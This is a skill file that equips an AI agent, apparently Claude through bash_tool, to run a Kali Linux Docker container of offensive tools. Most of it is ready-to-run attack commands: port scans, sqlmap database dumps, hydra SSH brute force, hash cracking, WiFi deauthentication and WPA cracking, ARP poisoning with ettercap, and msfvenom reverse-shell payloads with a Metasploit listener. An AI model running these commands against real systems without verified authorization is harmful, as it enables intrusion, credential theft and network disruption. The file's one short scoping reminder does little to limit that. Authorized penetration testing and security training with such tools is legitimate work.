Kali Docker Pentesting Skill
Overview
This skill provides intelligent access to a comprehensive Kali Linux Docker container with 200+ pentesting tools. Instead of using an MCP server, this skill enables direct command execution via bash_tool, making it 70% more token-efficient.
Container Management
Starting the Container
# Basic start docker run -d --name kali \ -v $(pwd)/workspace:/workspace \ -v $(pwd)/results:/results \ kali-comprehensive # With network capabilities (for actual scanning) docker run -d --name kali \ -v $(pwd)/workspace:/workspace \ -v $(pwd)/results:/results \ --cap-add=NET_RAW \ --cap-add=NET_ADMIN \ --network host \ kali-comprehensive # With GUI access (VNC) docker run -d --name kali \ -v $(pwd)/workspace:/workspace \ -p 5900:5900 \ -p 3389:3389 \ kali-comprehensive
Running Commands
# Execute single command docker exec kali [tool] [options] # Interactive shell docker exec -it kali /bin/bash # Copy files out docker cp kali:/results/scan.txt ./output/ # Copy files in docker cp ./wordlist.txt kali:/workspace/
Container Lifecycle
# Stop container docker stop kali # Start existing container docker start kali # Remove container docker rm kali # View logs docker logs kali
Tool Catalog
🔍 Network Discovery & Scanning
nmap - Network Mapper
Description: Industry-standard network scanner for host discovery, port scanning, and service detection.
Usage:
# Basic scan docker exec kali nmap 192.168.1.1 # Service version detection docker exec kali nmap -sV 192.168.1.1 # OS detection docker exec kali nmap -O 192.168.1.1 # Comprehensive scan docker exec kali nmap -sC -sV -O -p- 192.168.1.1 # Save results docker exec kali nmap -sV -oA /results/scan 192.168.1.0/24
Common Options:
- •
-sS- SYN stealth scan - •
-sT- TCP connect scan - •
-sU- UDP scan - •
-sV- Version detection - •
-O- OS detection - •
-A- Aggressive scan (OS, version, scripts, traceroute) - •
-p-- Scan all 65535 ports - •
-Pn- Skip ping (assume host is up) - •
-T4- Faster timing (0-5) - •
-oA- Output all formats
masscan - Fast Port Scanner
Description: Extremely fast port scanner, can scan the entire internet in under 6 minutes.
Usage:
# Scan specific ports docker exec kali masscan 192.168.1.0/24 -p80,443,8080 # Scan all ports fast docker exec kali masscan 192.168.1.0/24 -p0-65535 --rate=10000 # Save results docker exec kali masscan 10.0.0.0/8 -p80 -oL /results/masscan.txt
netdiscover - Network Discovery
Description: Active/passive ARP reconnaissance tool.
Usage:
# Passive mode docker exec kali netdiscover -p -i eth0 # Active mode with range docker exec kali netdiscover -r 192.168.1.0/24
arp-scan - ARP Scanner
Description: Discovers IPv4 hosts using ARP.
Usage:
docker exec kali arp-scan --localnet docker exec kali arp-scan 192.168.1.0/24
🌐 Web Application Testing
nikto - Web Server Scanner
Description: Web server vulnerability scanner.
Usage:
# Basic scan docker exec kali nikto -h http://target.com # SSL scan docker exec kali nikto -h https://target.com -ssl # Save results docker exec kali nikto -h http://target.com -o /results/nikto.txt # Tuning options docker exec kali nikto -h http://target.com -Tuning 123bde
dirb - Directory Brute Forcer
Description: Web content scanner.
Usage:
# Default wordlist docker exec kali dirb http://target.com # Custom wordlist docker exec kali dirb http://target.com /usr/share/wordlists/dirb/common.txt # Save results docker exec kali dirb http://target.com -o /results/dirb.txt # Extensions docker exec kali dirb http://target.com -X .php,.html,.txt
gobuster - Directory/DNS Enumeration
Description: Fast directory and DNS enumeration tool.
Usage:
# Directory enumeration docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt # DNS subdomain enumeration docker exec kali gobuster dns -d target.com -w /usr/share/wordlists/subdomains.txt # Virtual host discovery docker exec kali gobuster vhost -u http://target.com -w /usr/share/wordlists/vhosts.txt
wfuzz - Web Fuzzer
Description: Web application fuzzer.
Usage:
# Directory fuzzing docker exec kali wfuzz -c -z file,/usr/share/wordlists/dirb/common.txt --hc 404 http://target.com/FUZZ # Parameter fuzzing docker exec kali wfuzz -c -z file,/usr/share/wordlists/passwords.txt http://target.com/page?id=FUZZ # POST data fuzzing docker exec kali wfuzz -c -z file,users.txt -z file,pass.txt -d "user=FUZZ&pass=FUZ2Z" http://target.com/login
sqlmap - SQL Injection Tool
Description: Automatic SQL injection and database takeover tool.
Usage:
# Basic test docker exec kali sqlmap -u "http://target.com/page?id=1" # POST request docker exec kali sqlmap -u "http://target.com/login" --data="user=admin&pass=test" # Enumerate databases docker exec kali sqlmap -u "http://target.com/page?id=1" --dbs # Dump database docker exec kali sqlmap -u "http://target.com/page?id=1" -D dbname --dump # Full automation docker exec kali sqlmap -u "http://target.com/page?id=1" --batch --dump-all
wpscan - WordPress Scanner
Description: WordPress vulnerability scanner.
Usage:
# Basic scan docker exec kali wpscan --url http://target.com # Enumerate users docker exec kali wpscan --url http://target.com --enumerate u # Enumerate plugins docker exec kali wpscan --url http://target.com --enumerate p # Aggressive scan docker exec kali wpscan --url http://target.com --enumerate ap,at,cb,dbe
whatweb - Website Fingerprinting
Description: Identifies websites and web technologies.
Usage:
# Basic scan docker exec kali whatweb http://target.com # Aggressive mode docker exec kali whatweb -a 3 http://target.com # Scan multiple URLs docker exec kali whatweb -i /workspace/urls.txt
🔐 Password Attacks
john - John the Ripper
Description: Fast password cracker.
Usage:
# Crack with default wordlist docker exec kali john /workspace/hashes.txt # Use rockyou wordlist docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt /workspace/hashes.txt # Crack specific format docker exec kali john --format=raw-md5 /workspace/hashes.txt # Show cracked passwords docker exec kali john --show /workspace/hashes.txt # Incremental mode docker exec kali john --incremental /workspace/hashes.txt
hashcat - Advanced Password Recovery
Description: World's fastest password cracker.
Usage:
# MD5 crack docker exec kali hashcat -m 0 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt # SHA256 crack docker exec kali hashcat -m 1400 -a 0 hashes.txt wordlist.txt # Brute force docker exec kali hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a # Show results docker exec kali hashcat -m 0 hashes.txt --show
Hash Modes:
- •0 = MD5
- •100 = SHA1
- •1400 = SHA256
- •1700 = SHA512
- •1000 = NTLM
- •3200 = bcrypt
hydra - Network Password Cracker
Description: Fast network logon cracker.
Usage:
# SSH brute force docker exec kali hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://192.168.1.1 # HTTP POST form docker exec kali hydra -l admin -P passwords.txt 192.168.1.1 http-post-form "/login:user=^USER^&pass=^PASS^:F=incorrect" # FTP brute force docker exec kali hydra -L users.txt -P passwords.txt ftp://192.168.1.1 # Multiple protocols docker exec kali hydra -L users.txt -P passwords.txt 192.168.1.1 ssh ftp http
medusa - Parallel Password Cracker
Description: Speedy, parallel, modular login brute-forcer.
Usage:
# SSH attack docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M ssh # HTTP basic auth docker exec kali medusa -h 192.168.1.1 -u admin -P passwords.txt -M http
crunch - Wordlist Generator
Description: Generates custom wordlists.
Usage:
# Generate 6-8 character wordlist docker exec kali crunch 6 8 -o /results/wordlist.txt # Custom charset docker exec kali crunch 4 6 0123456789 -o /results/numbers.txt # Pattern-based docker exec kali crunch 8 8 -t pass@@@@ -o /results/pattern.txt
📡 Wireless Security
aircrack-ng - WiFi Security Suite
Description: Complete suite for assessing WiFi network security.
Usage:
# Start monitor mode docker exec kali airmon-ng start wlan0 # Capture packets docker exec kali airodump-ng wlan0mon # Capture specific network docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /results/capture wlan0mon # Deauth attack docker exec kali aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon # Crack WPA handshake docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /results/capture-01.cap
wifite - Automated Wireless Attack
Description: Automated wireless attack tool.
Usage:
# Automatic WPA attack docker exec kali wifite --wpa # All attack types docker exec kali wifite # Specific target docker exec kali wifite -i wlan0 --kill
reaver - WPS Attack
Description: Brute force WPS PINs.
Usage:
docker exec kali reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv
🕵️ Information Gathering
theharvester - Email/Subdomain Harvester
Description: Gather emails, subdomains, IPs from public sources.
Usage:
# Search all sources docker exec kali theharvester -d target.com -b all # Specific source docker exec kali theharvester -d target.com -b google # Save results docker exec kali theharvester -d target.com -b all -f /results/harvest
dnsrecon - DNS Enumeration
Description: DNS enumeration and network reconnaissance.
Usage:
# Standard enumeration docker exec kali dnsrecon -d target.com # Zone transfer docker exec kali dnsrecon -d target.com -a # Brute force subdomains docker exec kali dnsrecon -d target.com -D /usr/share/wordlists/subdomains.txt -t brt
sublist3r - Subdomain Enumeration
Description: Fast subdomain enumeration using OSINT.
Usage:
# Basic enumeration docker exec kali sublist3r -d target.com # Enable brute force docker exec kali sublist3r -d target.com -b # Save results docker exec kali sublist3r -d target.com -o /results/subdomains.txt
enum4linux - SMB Enumeration
Description: Tool for enumerating information from Windows and Samba systems.
Usage:
# Full enumeration docker exec kali enum4linux -a 192.168.1.1 # User enumeration docker exec kali enum4linux -U 192.168.1.1 # Share enumeration docker exec kali enum4linux -S 192.168.1.1
dmitry - Deep Information Gathering
Description: Deepmagic Information Gathering Tool.
Usage:
# Full scan docker exec kali dmitry -winsepo /results/dmitry.txt target.com # Subdomain search docker exec kali dmitry -s target.com
🛡️ Exploitation Frameworks
metasploit-framework - Penetration Testing Framework
Description: The world's most used penetration testing framework.
Usage:
# Start msfconsole docker exec -it kali msfconsole # Generate payload docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe > /results/payload.exe # Search exploits docker exec -it kali bash -c "echo 'search tomcat' | msfconsole -q" # Run resource script docker exec kali msfconsole -r /workspace/script.rc
Common msfvenom payloads:
# Windows reverse shell msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f exe -o shell.exe # Linux reverse shell msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f elf -o shell.elf # PHP reverse shell msfvenom -p php/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -f raw -o shell.php # Android APK msfvenom -p android/meterpreter/reverse_tcp LHOST=IP LPORT=4444 -o shell.apk
social-engineer-toolkit (SET)
Description: Social engineering penetration testing framework.
Usage:
# Start SET docker exec -it kali setoolkit
🔬 Forensics & Analysis
binwalk - Firmware Analysis
Description: Analyze and extract firmware images.
Usage:
# Scan for embedded files docker exec kali binwalk /workspace/firmware.bin # Extract files docker exec kali binwalk -e /workspace/firmware.bin # Signature scan docker exec kali binwalk --signature /workspace/file.bin
foremost - File Carving
Description: Recover files based on headers and footers.
Usage:
# Recover all file types docker exec kali foremost -i /workspace/image.dd -o /results/recovered # Specific file types docker exec kali foremost -t jpg,png,pdf -i /workspace/image.dd -o /results/
volatility - Memory Forensics
Description: Advanced memory forensics framework.
Usage:
# Get image info docker exec kali volatility -f /workspace/memory.dump imageinfo # List processes docker exec kali volatility -f /workspace/memory.dump --profile=Win7SP1x64 pslist # Dump process docker exec kali volatility -f /workspace/memory.dump --profile=Win7SP1x64 procdump -p 1234 -D /results/
strings - Extract Strings
Description: Extract printable strings from files.
Usage:
# Basic extraction docker exec kali strings /workspace/binary > /results/strings.txt # Minimum length 10 docker exec kali strings -n 10 /workspace/binary # Unicode strings docker exec kali strings -e l /workspace/binary
exiftool - Metadata Extraction
Description: Read and write meta information in files.
Usage:
# View metadata docker exec kali exiftool /workspace/image.jpg # Remove all metadata docker exec kali exiftool -all= /workspace/image.jpg # Batch process docker exec kali exiftool /workspace/*.jpg
🔄 Reverse Engineering
ghidra - Software Reverse Engineering
Description: NSA's software reverse engineering framework.
Usage:
# GUI mode (requires X11 forwarding) docker exec -it kali ghidra # Headless mode docker exec kali analyzeHeadless /workspace /project -import /workspace/binary.exe
radare2 - Reverse Engineering Framework
Description: Advanced reverse engineering framework.
Usage:
# Open binary docker exec -it kali r2 /workspace/binary # Analyze docker exec -it kali bash -c "echo 'aaa; pdf' | r2 /workspace/binary" # Disassemble docker exec kali r2 -c 'pd 10' /workspace/binary
gdb - GNU Debugger
Description: Standard debugger for Unix systems.
Usage:
# Debug binary docker exec -it kali gdb /workspace/binary # With PEDA docker exec -it kali gdb -q /workspace/binary
🎯 Vulnerability Assessment
lynis - Security Auditing
Description: Security auditing tool for Unix/Linux systems.
Usage:
# Full audit docker exec kali lynis audit system # Quick scan docker exec kali lynis audit system --quick
nikto - Web Vulnerability Scanner
(See Web Application Testing section)
openvas - Vulnerability Scanner
Description: Full-featured vulnerability scanner.
Usage:
# Start OpenVAS (requires initialization) docker exec kali openvas-start
📊 Network Analysis
tcpdump - Packet Capture
Description: Command-line packet analyzer.
Usage:
# Capture on interface docker exec kali tcpdump -i eth0 # Capture to file docker exec kali tcpdump -i eth0 -w /results/capture.pcap # Read file docker exec kali tcpdump -r /results/capture.pcap # Filter HTTP docker exec kali tcpdump -i eth0 'tcp port 80'
tshark - Network Protocol Analyzer
Description: Terminal-based Wireshark.
Usage:
# Capture packets docker exec kali tshark -i eth0 # Capture to file docker exec kali tshark -i eth0 -w /results/capture.pcap # Filter display docker exec kali tshark -r /results/capture.pcap -Y 'http.request'
ettercap - Network Sniffer/Interceptor
Description: Comprehensive suite for MITM attacks.
Usage:
# Text mode docker exec -it kali ettercap -T -i eth0 # ARP poisoning docker exec kali ettercap -T -M arp:remote /192.168.1.1// /192.168.1.100//
Common Pentesting Workflows
1. Network Reconnaissance
# Step 1: Discover live hosts docker exec kali nmap -sn 192.168.1.0/24 -oA /results/hosts # Step 2: Port scan discovered hosts docker exec kali nmap -sV -p- -iL /results/hosts.txt -oA /results/ports # Step 3: Enumerate services docker exec kali nmap -sC -sV -p 80,443,22,21 192.168.1.0/24 -oA /results/services
2. Web Application Assessment
# Step 1: Identify web technologies docker exec kali whatweb http://target.com # Step 2: Directory enumeration docker exec kali gobuster dir -u http://target.com -w /usr/share/wordlists/dirb/common.txt -o /results/dirs.txt # Step 3: Vulnerability scan docker exec kali nikto -h http://target.com -o /results/nikto.txt # Step 4: Test for SQLi docker exec kali sqlmap -u "http://target.com/page?id=1" --batch
3. Password Cracking Workflow
# Step 1: Generate wordlist docker exec kali crunch 8 12 -t Pass@@@@ -o /results/wordlist.txt # Step 2: Crack hashes docker exec kali john --wordlist=/results/wordlist.txt /workspace/hashes.txt # Step 3: Network service brute force docker exec kali hydra -L /workspace/users.txt -P /results/wordlist.txt ssh://192.168.1.1
4. Wireless Network Assessment
# Step 1: Enable monitor mode docker exec kali airmon-ng start wlan0 # Step 2: Scan networks docker exec kali airodump-ng wlan0mon # Step 3: Capture handshake docker exec kali airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /results/capture wlan0mon # Step 4: Deauth clients docker exec kali aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF wlan0mon # Step 5: Crack WPA docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt /results/capture-01.cap
5. Exploitation Workflow
# Step 1: Search for exploit docker exec kali searchsploit apache 2.4.49 # Step 2: Generate payload docker exec kali msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o /results/payload.exe # Step 3: Setup listener in Metasploit docker exec -it kali msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.1.100; set LPORT 4444; exploit"
File Management
Copying Files Between Host and Container
# Copy TO container docker cp ./local-file.txt kali:/workspace/ # Copy FROM container docker cp kali:/results/scan.txt ./output/ # Copy directory docker cp kali:/results/ ./output/
Working with Wordlists
Common Wordlist Locations:
- •
/usr/share/wordlists/rockyou.txt- Most popular password list - •
/usr/share/wordlists/dirb/common.txt- Common directories - •
/usr/share/seclists/- SecLists collection - •
/usr/share/wordlists/metasploit/- Metasploit wordlists
# List available wordlists docker exec kali find /usr/share/wordlists -type f # Extract rockyou (if gzipped) docker exec kali gunzip /usr/share/wordlists/rockyou.txt.gz
Troubleshooting
Container Won't Start
# Check logs docker logs kali # Remove and recreate docker rm kali docker run -d --name kali kali-comprehensive
Network Issues
# Use host network docker run -d --name kali --network host kali-comprehensive # Add network capabilities docker run -d --name kali --cap-add=NET_RAW --cap-add=NET_ADMIN kali-comprehensive
Permission Issues
# Run as root (already default) docker exec -u root kali [command] # Fix workspace permissions docker exec kali chmod -R 777 /workspace /results
Metasploit Database Issues
# Initialize database docker exec kali service postgresql start docker exec kali msfdb init # Check status docker exec kali msfdb status
Best Practices
1. Always Save Results
# Use output flags -o filename.txt # Generic output -oA basename # Nmap: all formats -w filename # Write to file > /results/output.txt # Shell redirect
2. Use Volumes for Persistence
Mount volumes for:
- •
/workspace- Working files - •
/results- Scan results - •
/wordlists- Custom wordlists
3. Scope Your Testing
Always:
- •Get written authorization
- •Define scope boundaries
- •Document everything
- •Report findings responsibly
4. Clean Up After Testing
# Stop monitor mode docker exec kali airmon-ng stop wlan0mon # Clear temporary files docker exec kali rm -rf /tmp/* # Archive results docker exec kali tar -czf /results/assessment-$(date +%Y%m%d).tar.gz /results/*.txt
Quick Reference
Port Scanning
docker exec kali nmap -sV -p- target
Directory Enumeration
docker exec kali gobuster dir -u http://target -w /usr/share/wordlists/dirb/common.txt
SQL Injection
docker exec kali sqlmap -u "http://target/page?id=1" --batch
Password Cracking
docker exec kali john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
Network Brute Force
docker exec kali hydra -l admin -P passwords.txt ssh://target
WiFi Cracking
docker exec kali aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap
When to Use This Skill
Use this skill when:
- •Conducting authorized penetration testing
- •Performing security assessments
- •Testing network security
- •Analyzing web applications
- •Cracking passwords (authorized)
- •Wireless security auditing
- •Forensics analysis
- •Reverse engineering
- •Learning security techniques
Claude will read this skill and execute commands via bash_tool, providing efficient, direct access to all pentesting tools without MCP protocol overhead.